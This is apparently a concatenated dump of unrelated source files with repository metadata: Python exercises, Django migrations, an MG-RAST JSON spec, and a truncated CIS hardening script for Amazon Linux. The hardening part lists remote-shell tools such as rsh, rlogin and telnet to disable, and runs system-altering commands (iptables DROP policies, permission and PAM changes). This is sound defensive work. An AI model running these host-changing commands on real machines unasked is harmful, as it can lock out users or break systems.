sys.exit(main(sys.argv[1:]))
| [
"kevin@skytruth.org"
] | kevin@skytruth.org |
4f9ca14ac345b49bbb0027d21927469e5a86964b | 9173442035ac395d841b8e6a0de00b790adec9f1 | /python/indexing.py | f72e3f84d409affc75e97715b2a3614d48b73252 | [] | no_license | rana811/python | ffcf356adb9424be1232502a144ffda614c444a7 | ac3b0a1f8af3c948d34d07031f707914792612e6 | refs/heads/master | 2022-07-17T01:04:10.670155 | 2020-05-10T14:57:44 | 2020-05-10T14:57:44 | 262,807,514 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 222 | py | # Get [1, 4, 5] from [[1, 2], [3, 4], [5, 6]] using indexing
import numpy as np
def extract(a_list):
return a_list[0][0],a_list[1][1],a_list[2,0]
arraylist = np.array([[1,2],[3,4],[5,6]])
print(extract(arraylist)) | [
"noreply@github.com"
] | noreply@github.com |
ca15e754c14f4db76db15fe9fb24de4b5692d004 | 2b42b40ae2e84b438146003bf231532973f1081d | /spec/mgm4459099.3.spec | f64a808352387d76005b2abdd7351b26ddfed579 | [] | no_license | MG-RAST/mtf | 0ea0ebd0c0eb18ec6711e30de7cc336bdae7215a | e2ddb3b145068f22808ef43e2bbbbaeec7abccff | refs/heads/master | 2020-05-20T15:32:04.334532 | 2012-03-05T09:51:49 | 2012-03-05T09:51:49 | 3,625,755 | 0 | 1 | null | null | null | null | UTF-8 | Python | false | false | 14,321 | spec | {
"id": "mgm4459099.3",
"metadata": {
"mgm4459099.3.metadata.json": {
"format": "json",
"provider": "metagenomics.anl.gov"
}
},
"providers": {
"metagenomics.anl.gov": {
"files": {
"100.preprocess.info": {
"compression": null,
"description": null,
"size": 736,
"type": "txt",
"url": "http://api.metagenomics.anl.gov/analysis/data/id/mgm4459099.3/file/100.preprocess.info"
},
"100.preprocess.passed.fna.gz": {
"compression": "gzip",
"description": null,
"size": 1797195,
"type": "fasta",
"url": "http://api.metagenomics.anl.gov/analysis/data/id/mgm4459099.3/file/100.preprocess.passed.fna.gz"
},
"100.preprocess.passed.fna.stats": {
"compression": null,
"description": null,
"size": 310,
"type": "fasta",
"url": "http://api.metagenomics.anl.gov/analysis/data/id/mgm4459099.3/file/100.preprocess.passed.fna.stats"
},
"100.preprocess.removed.fna.gz": {
"compression": "gzip",
"description": null,
"size": 12697,
"type": "fasta",
"url": "http://api.metagenomics.anl.gov/analysis/data/id/mgm4459099.3/file/100.preprocess.removed.fna.gz"
},
"100.preprocess.removed.fna.stats": {
"compression": null,
"description": null,
"size": 303,
"type": "fasta",
"url": "http://api.metagenomics.anl.gov/analysis/data/id/mgm4459099.3/file/100.preprocess.removed.fna.stats"
},
"205.screen.h_sapiens_asm.info": {
"compression": null,
"description": null,
"size": 450,
"type": "txt",
"url": "http://api.metagenomics.anl.gov/analysis/data/id/mgm4459099.3/file/205.screen.h_sapiens_asm.info"
},
"299.screen.info": {
"compression": null,
"description": null,
"size": 410,
"type": "txt",
"url": "http://api.metagenomics.anl.gov/analysis/data/id/mgm4459099.3/file/299.screen.info"
},
"299.screen.passed.fna.gcs": {
"compression": null,
"description": null,
"size": 2985,
"type": "fasta",
"url": "http://api.metagenomics.anl.gov/analysis/data/id/mgm4459099.3/file/299.screen.passed.fna.gcs"
},
"299.screen.passed.fna.gz": {
"compression": "gzip",
"description": null,
"size": 1209484,
"type": "fasta",
"url": "http://api.metagenomics.anl.gov/analysis/data/id/mgm4459099.3/file/299.screen.passed.fna.gz"
},
"299.screen.passed.fna.lens": {
"compression": null,
"description": null,
"size": 579,
"type": "fasta",
"url": "http://api.metagenomics.anl.gov/analysis/data/id/mgm4459099.3/file/299.screen.passed.fna.lens"
},
"299.screen.passed.fna.stats": {
"compression": null,
"description": null,
"size": 310,
"type": "fasta",
"url": "http://api.metagenomics.anl.gov/analysis/data/id/mgm4459099.3/file/299.screen.passed.fna.stats"
},
"440.cluster.rna97.fna.gz": {
"compression": "gzip",
"description": null,
"size": 62053,
"type": "fasta",
"url": "http://api.metagenomics.anl.gov/analysis/data/id/mgm4459099.3/file/440.cluster.rna97.fna.gz"
},
"440.cluster.rna97.fna.stats": {
"compression": null,
"description": null,
"size": 308,
"type": "fasta",
"url": "http://api.metagenomics.anl.gov/analysis/data/id/mgm4459099.3/file/440.cluster.rna97.fna.stats"
},
"440.cluster.rna97.info": {
"compression": null,
"description": null,
"size": 947,
"type": "txt",
"url": "http://api.metagenomics.anl.gov/analysis/data/id/mgm4459099.3/file/440.cluster.rna97.info"
},
"440.cluster.rna97.mapping": {
"compression": null,
"description": null,
"size": 2063115,
"type": "txt",
"url": "http://api.metagenomics.anl.gov/analysis/data/id/mgm4459099.3/file/440.cluster.rna97.mapping"
},
"440.cluster.rna97.mapping.stats": {
"compression": null,
"description": null,
"size": 50,
"type": "txt",
"url": "http://api.metagenomics.anl.gov/analysis/data/id/mgm4459099.3/file/440.cluster.rna97.mapping.stats"
},
"450.rna.expand.lca.gz": {
"compression": "gzip",
"description": null,
"size": 417890,
"type": "txt",
"url": "http://api.metagenomics.anl.gov/analysis/data/id/mgm4459099.3/file/450.rna.expand.lca.gz"
},
"450.rna.expand.rna.gz": {
"compression": "gzip",
"description": null,
"size": 111447,
"type": "txt",
"url": "http://api.metagenomics.anl.gov/analysis/data/id/mgm4459099.3/file/450.rna.expand.rna.gz"
},
"450.rna.sims.filter.gz": {
"compression": "gzip",
"description": null,
"size": 70938,
"type": "txt",
"url": "http://api.metagenomics.anl.gov/analysis/data/id/mgm4459099.3/file/450.rna.sims.filter.gz"
},
"450.rna.sims.gz": {
"compression": "gzip",
"description": null,
"size": 747722,
"type": "txt",
"url": "http://api.metagenomics.anl.gov/analysis/data/id/mgm4459099.3/file/450.rna.sims.gz"
},
"900.abundance.function.gz": {
"compression": "gzip",
"description": null,
"size": 37710,
"type": "txt",
"url": "http://api.metagenomics.anl.gov/analysis/data/id/mgm4459099.3/file/900.abundance.function.gz"
},
"900.abundance.lca.gz": {
"compression": "gzip",
"description": null,
"size": 20045,
"type": "txt",
"url": "http://api.metagenomics.anl.gov/analysis/data/id/mgm4459099.3/file/900.abundance.lca.gz"
},
"900.abundance.md5.gz": {
"compression": "gzip",
"description": null,
"size": 45369,
"type": "txt",
"url": "http://api.metagenomics.anl.gov/analysis/data/id/mgm4459099.3/file/900.abundance.md5.gz"
},
"900.abundance.ontology.gz": {
"compression": "gzip",
"description": null,
"size": 43,
"type": "txt",
"url": "http://api.metagenomics.anl.gov/analysis/data/id/mgm4459099.3/file/900.abundance.ontology.gz"
},
"900.abundance.organism.gz": {
"compression": "gzip",
"description": null,
"size": 64413,
"type": "txt",
"url": "http://api.metagenomics.anl.gov/analysis/data/id/mgm4459099.3/file/900.abundance.organism.gz"
},
"900.loadDB.sims.filter.seq": {
"compression": null,
"description": null,
"size": 21824443,
"type": "txt",
"url": "http://api.metagenomics.anl.gov/analysis/data/id/mgm4459099.3/file/900.loadDB.sims.filter.seq"
},
"900.loadDB.source.stats": {
"compression": null,
"description": null,
"size": 128,
"type": "txt",
"url": "http://api.metagenomics.anl.gov/analysis/data/id/mgm4459099.3/file/900.loadDB.source.stats"
},
"999.done.COG.stats": {
"compression": null,
"description": null,
"size": 1,
"type": "txt",
"url": "http://api.metagenomics.anl.gov/analysis/data/id/mgm4459099.3/file/999.done.COG.stats"
},
"999.done.KO.stats": {
"compression": null,
"description": null,
"size": 1,
"type": "txt",
"url": "http://api.metagenomics.anl.gov/analysis/data/id/mgm4459099.3/file/999.done.KO.stats"
},
"999.done.NOG.stats": {
"compression": null,
"description": null,
"size": 1,
"type": "txt",
"url": "http://api.metagenomics.anl.gov/analysis/data/id/mgm4459099.3/file/999.done.NOG.stats"
},
"999.done.Subsystems.stats": {
"compression": null,
"description": null,
"size": 1,
"type": "txt",
"url": "http://api.metagenomics.anl.gov/analysis/data/id/mgm4459099.3/file/999.done.Subsystems.stats"
},
"999.done.class.stats": {
"compression": null,
"description": null,
"size": 1553,
"type": "txt",
"url": "http://api.metagenomics.anl.gov/analysis/data/id/mgm4459099.3/file/999.done.class.stats"
},
"999.done.domain.stats": {
"compression": null,
"description": null,
"size": 50,
"type": "txt",
"url": "http://api.metagenomics.anl.gov/analysis/data/id/mgm4459099.3/file/999.done.domain.stats"
},
"999.done.family.stats": {
"compression": null,
"description": null,
"size": 5075,
"type": "txt",
"url": "http://api.metagenomics.anl.gov/analysis/data/id/mgm4459099.3/file/999.done.family.stats"
},
"999.done.genus.stats": {
"compression": null,
"description": null,
"size": 7360,
"type": "txt",
"url": "http://api.metagenomics.anl.gov/analysis/data/id/mgm4459099.3/file/999.done.genus.stats"
},
"999.done.order.stats": {
"compression": null,
"description": null,
"size": 2823,
"type": "txt",
"url": "http://api.metagenomics.anl.gov/analysis/data/id/mgm4459099.3/file/999.done.order.stats"
},
"999.done.phylum.stats": {
"compression": null,
"description": null,
"size": 638,
"type": "txt",
"url": "http://api.metagenomics.anl.gov/analysis/data/id/mgm4459099.3/file/999.done.phylum.stats"
},
"999.done.rarefaction.stats": {
"compression": null,
"description": null,
"size": 22820,
"type": "txt",
"url": "http://api.metagenomics.anl.gov/analysis/data/id/mgm4459099.3/file/999.done.rarefaction.stats"
},
"999.done.sims.stats": {
"compression": null,
"description": null,
"size": 80,
"type": "txt",
"url": "http://api.metagenomics.anl.gov/analysis/data/id/mgm4459099.3/file/999.done.sims.stats"
},
"999.done.species.stats": {
"compression": null,
"description": null,
"size": 21679,
"type": "txt",
"url": "http://api.metagenomics.anl.gov/analysis/data/id/mgm4459099.3/file/999.done.species.stats"
}
},
"id": "mgm4459099.3",
"provider": "metagenomics.anl.gov",
"providerId": "mgm4459099.3"
}
},
"raw": {
"mgm4459099.3.fna.gz": {
"compression": "gzip",
"format": "fasta",
"provider": "metagenomics.anl.gov",
"url": "http://api.metagenomics.anl.gov/reads/mgm4459099.3"
}
}
} | [
"jared.wilkening@gmail.com"
] | jared.wilkening@gmail.com |
6f590f2c761cd1220e5ca1df8b95fc08618bfc20 | 85dfec15ff7b358efdae421809e95f4d8d356c23 | /lab5_1/ppo/migrations/0001_initial.py | 1d4f47c0dbea9687294836997563433b6a6f2b7c | [] | no_license | Abenov222Sanjar/django | cc874f00d7dc9b6e438a5acaf5d0e2e11e4f17c8 | b40040a0dad8c6bd507fe29c54160b30ec41b85d | refs/heads/master | 2023-03-23T16:25:39.227069 | 2021-03-20T08:53:29 | 2021-03-20T08:53:29 | 349,625,130 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,389 | py | # Generated by Django 3.1.7 on 2021-03-20 08:24
from django.db import migrations, models
import ppo.models
class Migration(migrations.Migration):
initial = True
dependencies = [
('auth', '0012_alter_user_first_name_max_length'),
]
operations = [
migrations.CreateModel(
name='MainUser',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('password', models.CharField(max_length=128, verbose_name='password')),
('last_login', models.DateTimeField(blank=True, null=True, verbose_name='last login')),
('is_superuser', models.BooleanField(default=False, help_text='Designates that this user has all permissions without explicitly assigning them.', verbose_name='superuser status')),
('email', models.EmailField(max_length=254, unique=True, verbose_name='email address')),
('first_name', models.CharField(blank=True, max_length=30, verbose_name='first name')),
('last_name', models.CharField(blank=True, max_length=30, verbose_name='last name')),
('date_joined', models.DateTimeField(auto_now_add=True, verbose_name='date joined')),
('is_active', models.BooleanField(default=True, verbose_name='active')),
('is_staff', models.BooleanField(default=False, verbose_name='is_staff')),
('role', models.SmallIntegerField(choices=[(1, 'super admin'), (2, 'company director'), (3, 'hr manager'), (4, 'employee'), (5, 'department director')], default=4)),
('groups', models.ManyToManyField(blank=True, help_text='The groups this user belongs to. A user will get all permissions granted to each of their groups.', related_name='user_set', related_query_name='user', to='auth.Group', verbose_name='groups')),
('user_permissions', models.ManyToManyField(blank=True, help_text='Specific permissions for this user.', related_name='user_set', related_query_name='user', to='auth.Permission', verbose_name='user permissions')),
],
options={
'verbose_name': 'user',
'verbose_name_plural': 'users',
},
managers=[
('objects', ppo.models.MainUserManager()),
],
),
]
| [
"d.sanjjjar@gmail.com"
] | d.sanjjjar@gmail.com |
589622c55a74eca1fc73975a0a765d941516878c | 0531120d1b6130633a6e0f95299b58867526174d | /file5_1.py | 84e22f6199f6883446ed88aa523a3760c19b9c3c | [] | no_license | wohao/cookbook | d5a5c6dce954dcf9b5f46389755362c8ae37cf32 | e7da30d4db804eed7cb752cc078239a9c4bcff06 | refs/heads/master | 2020-12-30T16:15:16.743739 | 2017-05-11T11:25:40 | 2017-05-11T11:25:40 | 90,970,931 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,759 | py | with open('somefile.txt','wt') as f:
f.write('I Love You')
f = open('somefile.txt','rt')
data = f.read()
f.close()
with open('D:\python\cookbook\somefile.txt','wt') as f:
print('Hello world!',file=f)
print('ACME',50,91.5)
print('ACME',50,91.5, sep='')
print('ACME',50,91.5, sep=',')
print('ACME',50,91.5, sep='',end='!!\n')
for i in range(5):
print(i,end=' ')
rows = ('ACME',50,91.5)
print(','.join(str(x) for x in rows))
print(*rows,sep=',')
with open('somefile.bin','wb') as f:
f.write(b'Hello world')
with open('somefile.bin','rb') as f:
data = f.read()
print(data)
b = b'hello world'
for c in b :
print(c)
with open('somefile.bin','wb') as f :
text = 'I love you'
f.write(text.encode('utf-8'))
with open('somefile.bin','rb') as f:
data =f.read(16)
text = data.decode('utf-8')
print(text)
import array
nums = array.array('i',[1,2,3,4])
with open('data.bin','wb') as f:
f.write(nums)
a = array.array('i',[0,0,0,0,0,0,0])
with open('data.bin','rb') as f:
f.readinto(a)
print(a)
# with open('D:\python\cookbook\somefile.txt','xt') as f:
# f.write('I love you')
import os
if not os.path.exists('D:\python\cookbook\somefile.txt'):
with open('D:\python\cookbook\somefile.txt','wt') as f:
f.write('I love you')
else:
print('file already exists')
import io
s = io.StringIO()
s.write('hello world\n')
print('this is a test',file=s)
print(s.getvalue())
s =io.StringIO('Hello\nworld\n')
print(s.read(4))
print(s.read())
s = io.BytesIO()
s.write(b'binary data')
print(s.getvalue())
import gzip
with gzip.open('somefile.gz','rt') as f:
#f.write(text)
text = f.read()
print(text)
import bz2
with bz2.open('somefile.bz2','wt') as f:
f.write(text)
f = open('somefile.gz','rb')
with gzip.open(f,'rt') as g:
text = g.read()
| [
"2285687708@qq.com"
] | 2285687708@qq.com |
299d305fdf5120d7ae4877948db9c5066b969a08 | 74a8a159eacf9ae58ad9fe18d9ef2ce7e07f7abb | /agora/board/migrations/0002_auto_20150205_0230.py | a66dd58fe30964a8edfd0fa707985c61a31c1495 | [] | no_license | anderoonies/Agora | 74893317be2f0865f1c8667bfb07f7e6b8a0a7de | 2fdcd750f6b374d22fe223cb7908e35c2dcde2c6 | refs/heads/master | 2021-01-16T19:44:20.862465 | 2015-02-15T21:29:14 | 2015-02-15T21:29:14 | 30,504,649 | 0 | 0 | null | 2015-02-08T20:30:28 | 2015-02-08T20:30:27 | null | UTF-8 | Python | false | false | 605 | py | # -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import models, migrations
class Migration(migrations.Migration):
dependencies = [
('board', '0001_initial'),
]
operations = [
migrations.AlterField(
model_name='post',
name='score',
field=models.SmallIntegerField(null=True),
preserve_default=True,
),
migrations.AlterField(
model_name='post',
name='time',
field=models.DateField(null=True),
preserve_default=True,
),
]
| [
"andrewbayer2016@u.northwestern.edu"
] | andrewbayer2016@u.northwestern.edu |
b3f5d0c910c8f9d43e879694c07e0dc8cb5a7f18 | 75bc35acfc11f9d142dfaf66d276131538e6812d | /__main__.py | 241fc68d6cce1db77c061bcecd775704163c485f | [] | no_license | arunreddy00/AmazonLinux-Hardeningscript | 6f60d4ba52cc856124e0ca145b2cff0ce72d8fa7 | 1037b3301f11e9107555142c24cd6bb5f99fd827 | refs/heads/main | 2023-04-18T10:20:23.056121 | 2021-05-09T15:19:03 | 2021-05-09T15:19:03 | 365,781,821 | 3 | 2 | null | null | null | null | UTF-8 | Python | false | false | 19,331 | py | """Bootstrap script for Amazon Linux to comply CIS Amazon Linux Benchmark v2.0.0"""
import argparse
import logging
import os
import re
from subprocess import CalledProcessError
import pkg_resources
from util import exec_shell, set_backup_enabled, File, Package, Service, PropertyFile
def get_string_asset(path):
"""Returns the content of the specified asset file"""
return pkg_resources.resource_string(__name__, 'assets/{}'.format(path))
def disable_unused_filesystems():
"""1.1.1 Disable unused filesystems"""
filesystems = [
'cramfs', 'freevxfs', 'jffs2', 'hfs', 'hfsplus', 'squashfs', 'udf', 'vfat'
]
prop = PropertyFile('/etc/modprobe.d/CIS.conf', ' ')
for filesystem in filesystems:
prop.override({'install {}'.format(filesystem): '/bin/true'})
prop.write()
def set_mount_options():
"""1.1.2 - 1.1.17"""
options = {
'/tmp': 'tmpfs /tmp tmpfs rw,nosuid,nodev,noexec,relatime 0 0',
'/var/tmp': 'tmpfs /var/tmp tmpfs rw,nosuid,nodev,noexec,relatime 0 0',
'/home': '/dev/xvdf1 /home ext4 rw,nodev,relatime,data=ordered 0 0',
'/dev/shm': 'tmpfs /dev/shm tmpfs rw,nosuid,nodev,noexec,relatime 0 0'
}
with open('/etc/fstab', 'r') as f:
for line in f:
if line.startswith('#'):
continue
partition = line.split()[1]
if partition not in options:
options[partition] = line.strip()
with open('/etc/fstab', 'w') as f:
for record in options.values():
f.write('{}\n'.format(record))
def ensure_sticky_bit():
"""1.1.18 Ensure sticky bit is set on all world - writable directories"""
try:
return exec_shell(['df --local -P | awk {\'if (NR!=1) print $6\'} | xargs -I \'{}\' find \'{}\' -xdev -type d -perm -0002 2>/dev/null | xargs chmod a+t'])
except CalledProcessError:
return 1
def disable_automounting():
"""1.1.19 Disable Automounting"""
Service('autofs').disable()
def enable_aide():
"""1.3 Filesystem Integrity Checking"""
cron_job = '0 5 * * * /usr/sbin/aide --check'
Package('aide').install()
return exec_shell([
'aide --init',
'mv /var/lib/aide/aide.db.new.gz /var/lib/aide/aide.db.gz',
'(crontab -u root -l 2>/dev/null | grep -v /usr/sbin/aide; echo "{}") | crontab -'.format(cron_job)
])
def secure_boot_settings():
"""1.4 Secure Boot Settings"""
if os.path.isfile('/boot/grub/menu.lst'):
exec_shell([
'chown root:root /boot/grub/menu.lst',
'chmod og-rwx /boot/grub/menu.lst'
])
PropertyFile('/etc/sysconfig/init', '=').override({
'SINGLE': '/sbin/sulogin',
'PROMPT': 'no'
}).write()
def apply_process_hardenings():
"""1.5 Additional Process Hardening"""
# 1.5.1 Ensure core dumps are restricted
PropertyFile('/etc/security/limits.conf', ' ').override({
'* hard core': '0'
}).write()
PropertyFile('/etc/sysctl.conf', ' = ').override({
'fs.suid_dumpable': '0'
}).write()
# 1.5.3 Ensure address space layout randomization (ASLR) is enable
PropertyFile('/etc/sysctl.conf', ' = ').override({
'kernel.randomize_va_space': '2'
}).write()
# 1.5.4 Ensure prelink is disabled
Package('prelink').remove()
def configure_warning_banners():
"""1.7 Warning Banners"""
# 1.7.1 Command Line Warning Banners
exec_shell([
'update-motd --disable',
'chown root:root /etc/motd',
'chmod 644 /etc/motd'
])
File('/etc/motd').write(get_string_asset('/etc/motd'))
exec_shell(['chown root:root /etc/issue', 'chmod 644 /etc/issue'])
File('/etc/issue').write('Authorized uses only. All activity may be monitored and reported.\n')
exec_shell(['chown root:root /etc/issue.net', 'chmod 644 /etc/issue.net'])
File('/etc/issue.net').write('Authorized uses only. All activity may be monitored and reported.\n')
def ensure_updated():
"""1.8 Ensure updates, patches, and additional security software are installed"""
Package.update_all()
def disable_inetd_services():
"""2.1 inetd Services"""
services = [
'chargen-dgram', 'chargen-stream', 'daytime-dgram', 'daytime-stream',
'discard-dgram', 'discard-stream', 'echo-dgram', 'echo-stream',
'time-dgram', 'time-stream', 'rexec', 'rlogin', 'rsh', 'talk',
'telnet', 'tftp', 'rsync', 'xinetd'
]
for srv in services:
Service(srv).disable()
def configure_time_synchronization(upstream, chrony=True):
"""2.2.1 Time Synchronization"""
if chrony:
configure_chrony(upstream)
else:
configure_ntp(upstream)
def configure_ntp(upstream):
"""2.2.1 Time Synchronization"""
# 2.2.1.1 Ensure time synchronization is in use
Package('chrony').remove()
Package('ntp').install()
# 2.2.1.2 Ensure ntp is configured
PropertyFile('/etc/ntp.conf', ' ').override({
'restrict default': None,
'restrict -4 default': 'kod nomodify notrap nopeer noquery',
'restrict -6 default': 'kod nomodify notrap nopeer noquery',
'server': upstream
}).write()
PropertyFile('/etc/sysconfig/ntpd', '=').override({
'OPTIONS': '"-u ntp:ntp"'
}).write()
def configure_chrony(upstream):
"""2.2.1 Time Synchronization"""
# 2.2.1.1 Ensure time synchronization is in use
Package('ntp').remove()
Package('chrony').install()
# 2.2.1.3 Ensure chrony is configured
PropertyFile('/etc/chrony.conf', ' ').override({
'server': upstream
}).write()
PropertyFile('/etc/sysconfig/chronyd', '=').override({
'OPTIONS': '"-u chrony"'
}).write()
exec_shell([
'chkconfig chronyd on',
])
def remove_x11_packages():
"""2.2.2 Ensure X Window System is not installed"""
Package('xorg-x11*').remove()
def disable_special_services():
"""2.2.3 - 2.2.14, 2.2.16"""
services = [
'avahi-daemon', 'cups',
'dhcpd', 'slapd', 'nfs', 'rpcbind', 'named', 'vsftpd',
'httpd', 'dovecot', 'smb', 'squid', 'snmpd', 'ypserv'
]
for srv in services:
Service(srv).disable()
def configure_mta():
"""2.2.15 Ensure mail transfer agent is configured for local - only mode"""
exec_shell([
'mkdir -p /etc/postfix',
'touch /etc/postfix/main.cf'
])
PropertyFile('/etc/postfix/main.cf', ' = ').override({
'inet_interfaces': 'localhost'
}).write()
def remove_insecure_clients():
"""2.3 Service Clients"""
packages = [
'ypbind', 'rsh', 'talk',
'telnet', 'openldap-clients'
]
for package in packages:
Package(package).remove()
def configure_host_network_params():
"""3.1 Network Parameters(Host Only)"""
PropertyFile('/etc/sysctl.conf', ' = ').override({
'net.ipv4.ip_forward': '0',
'net.ipv4.conf.all.send_redirects': '0',
'net.ipv4.conf.default.send_redirects': '0',
}).write()
def configure_network_params():
"""3.2 Network Parameters(Host and Router)"""
PropertyFile('/etc/sysctl.conf', ' = ').override({
'net.ipv4.conf.all.accept_source_route': '0',
'net.ipv4.conf.default.accept_source_route': '0',
'net.ipv4.conf.all.accept_redirects': '0',
'net.ipv4.conf.default.accept_redirects': '0',
'net.ipv4.conf.all.secure_redirects': '0',
'net.ipv4.conf.default.secure_redirects': '0',
'net.ipv4.conf.all.log_martians': '1',
'net.ipv4.conf.default.log_martians': '1',
'net.ipv4.icmp_echo_ignore_broadcasts': '1',
'net.ipv4.icmp_ignore_bogus_error_responses': '1',
'net.ipv4.conf.all.rp_filter': '1',
'net.ipv4.conf.default.rp_filter': '1',
'net.ipv4.tcp_syncookies': '1'
}).write()
def configure_ipv6_params():
"""3.3 IPv6"""
PropertyFile('/etc/sysctl.conf', ' = ').override({
'net.ipv6.conf.all.accept_ra': '0',
'net.ipv6.conf.default.accept_ra': '0',
'net.ipv6.conf.all.accept_redirects': '0',
'net.ipv6.conf.default.accept_redirects': '0'
}).write()
# 3.3.3 Ensure IPv6 is disabled
PropertyFile('/etc/modprobe.d/CIS.conf', ' ').override({
'options ipv6': 'disable=1'
}).write()
def configure_tcp_wrappers(hosts):
"""3.4 TCP Wrappers"""
# 3.4.1 Ensure TCP Wrappers is installed
Package('tcp_wrappers').install()
if hosts:
# 3.4.2 Ensure /etc/hosts.allow is configured
allowed_hosts = ','.join(hosts)
exec_shell('echo "ALL: {}" > /etc/hosts.allow'.format(allowed_hosts))
# 3.4.3 Ensure /etc/hosts.deny is configured
exec_shell('echo "ALL: ALL" > /etc/hosts.deny')
# 3.4.4 Ensure permissions on /etc/hosts.allow are configured
exec_shell([
'chown root:root /etc/hosts.allow',
'chmod 644 /etc/hosts.allow'
])
# 3.4.5 Ensure permissions on /etc/hosts.deny are configured
exec_shell([
'chown root:root /etc/hosts.deny',
'chmod 644 /etc/hosts.deny'
])
def disable_uncommon_protocols():
"""3.5 Uncommon Network Protocols"""
modules = [
'dccp', 'sctp', 'rds', 'tipc'
]
prop = PropertyFile('/etc/modprobe.d/CIS.conf', ' ')
for mod in modules:
prop.override({'install {}'.format(mod): '/bin/true'})
prop.write()
def configure_iptables():
"""3.6 Firewall Configuration"""
Package('iptables').install()
exec_shell([
'iptables -F',
'iptables -P INPUT DROP',
'iptables -P OUTPUT DROP',
'iptables -P FORWARD DROP',
'iptables -A INPUT -i lo -j ACCEPT',
'iptables -A OUTPUT -o lo -j ACCEPT',
'iptables -A INPUT -s 127.0.0.0/8 -j DROP',
'iptables -A OUTPUT -p tcp -m state --state NEW,ESTABLISHED -j ACCEPT',
'iptables -A OUTPUT -p udp -m state --state NEW,ESTABLISHED -j ACCEPT',
'iptables -A OUTPUT -p icmp -m state --state NEW,ESTABLISHED -j ACCEPT',
'iptables -A INPUT -p tcp -m state --state ESTABLISHED -j ACCEPT',
'iptables -A INPUT -p udp -m state --state ESTABLISHED -j ACCEPT',
'iptables -A INPUT -p icmp -m state --state ESTABLISHED -j ACCEPT',
'iptables -A INPUT -p tcp --dport 22 -m state --state NEW -j ACCEPT',
'iptables-save'
])
def configure_rsyslog():
"""4.2.1 Configure rsyslog"""
Package('rsyslog').install()
PropertyFile('/etc/rsyslog.conf', ' ').override({
'*.emerg': ':omusrmsg:*',
'mail.*': '-/var/log/mail',
'mail.info': '-/var/log/mail.info',
'mail.warning': '-/var/log/mail.warn',
'mail.err': '/var/log/mail.err',
'news.crit': '-/var/log/news/news.crit',
'news.err': '-/var/log/news/news.err',
'news.notice': '-/var/log/news/news.notice',
'*.=warning;*.=err': '-/var/log/warn',
'*.crit': '/var/log/warn',
'*.*;mail.none;news.none': '-/var/log/messages',
'local0,local1.*': '-/var/log/localmessages',
'local2,local3.*': '-/var/log/localmessages',
'local4,local5.*': '-/var/log/localmessages',
'local6,local7.*': '-/var/log/localmessages ',
'$FileCreateMode': '0640'
}).write()
def configure_log_file_permissions():
"""4.2.4 Ensure permissions on all logfiles are configured"""
exec_shell([r'find /var/log -type f -exec chmod g-wx,o-rwx {} +'])
def configure_cron():
"""5.1 Configure cron"""
# 5.1.1 Ensure cron daemon is enabled
Service('crond').enable()
# 5.1.2 - 5.1.8
exec_shell([
'chown root:root /etc/crontab',
'chmod og-rwx /etc/crontab',
'chown root:root /etc/cron.hourly',
'chmod og-rwx /etc/cron.hourly',
'chown root:root /etc/cron.daily',
'chmod og-rwx /etc/cron.daily',
'chown root:root /etc/cron.weekly',
'chmod og-rwx /etc/cron.weekly',
'chown root:root /etc/cron.monthly',
'chmod og-rwx /etc/cron.monthly',
'chown root:root /etc/cron.d',
'chmod og-rwx /etc/cron.d',
'rm -f /etc/cron.deny',
'rm -f /etc/at.deny',
'touch /etc/cron.allow',
'touch /etc/at.allow',
'chmod og-rwx /etc/cron.allow',
'chmod og-rwx /etc/at.allow',
'chown root:root /etc/cron.allow',
'chown root:root /etc/at.allow'
])
def configure_sshd():
"""5.2 SSH Server Configuration"""
# 5.2.1 Ensure permissions on /etc/ssh/sshd_config are configured
exec_shell([
'chown root:root /etc/ssh/sshd_config',
'chmod og-rwx /etc/ssh/sshd_config'
])
# 5.2.2 - 5.2.16
PropertyFile('/etc/ssh/sshd_config', ' ').override({
'Protocol': '2',
'LogLevel': 'INFO',
'X11Forwarding': 'no',
'MaxAuthTries': '4',
'IgnoreRhosts': 'yes',
'HostbasedAuthentication': 'no',
'PermitRootLogin': 'no',
'PermitEmptyPasswords': 'no',
'PermitUserEnvironment': 'no',
'Ciphers': 'aes256-ctr,aes192-ctr,aes128-ctr',
'MACs': 'hmac-sha2-512-etm@openssh.com,hmac-sha2-256-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-512,hmac-sha2-256,umac-128@openssh.com',
'ClientAliveInterval': '300',
'ClientAliveCountMax': '0',
'LoginGraceTime': '60',
'AllowUsers': 'ec2-user',
'Banner': '/etc/issue.net'
}).write()
def configure_pam():
"""5.3 Configure PAM"""
def convert_password(line):
if password_unix_re.match(line):
if 'remember=5' not in line:
line += ' remember=5'
if 'sha512' not in line:
line += ' sha512'
return line
password_unix_re = re.compile(r'^password\s+sufficient\s+pam_unix.so')
password_auth_content = get_string_asset('/etc/pam.d/password-auth')
password_auth_content += exec_shell([
'cat /etc/pam.d/password-auth | grep -v "^auth"'
])
password_auth_content = '\n'.join([
convert_password(line) for line in password_auth_content.splitlines()
])
with open('/etc/pam.d/password-auth-local', 'w') as f:
f.write(password_auth_content)
exec_shell(['ln -sf /etc/pam.d/password-auth-local /etc/pam.d/password-auth'])
system_auth_content = get_string_asset('/etc/pam.d/system-auth')
system_auth_content += exec_shell([
'cat /etc/pam.d/system-auth | grep -v "^auth"'
])
system_auth_content = '\n'.join([
convert_password(line) for line in system_auth_content.splitlines()
])
with open('/etc/pam.d/system-auth-local', 'w') as f:
f.write(system_auth_content)
exec_shell(
['ln -sf /etc/pam.d/system-auth-local /etc/pam.d/system-auth'])
PropertyFile('/etc/security/pwquality.conf', '=').override({
'minlen': '14',
'dcredit': '-1',
'ucredit': '-1',
'ocredit': '-1',
'lcredit': '-1'
}).write()
def configure_password_parmas():
"""5.4.1 Set Shadow Password Suite Parameters"""
PropertyFile('/etc/login.defs', '\t').override({
'PASS_MAX_DAYS': '90',
'PASS_MIN_DAYS': '7',
'PASS_WARN_AGE': '7'
}).write()
exec_shell([
'useradd -D -f 30'
])
def configure_umask():
"""5.4.3, 5.4.4"""
umask_reg = r'^(\s*)umask\s+[0-7]+(\s*)$'
bashrc = exec_shell([
'cat /etc/bashrc | sed -E "s/{}/\\1umask 027\\2/g"'.format(umask_reg)
])
File('/etc/bashrc').write(bashrc)
profile = exec_shell([
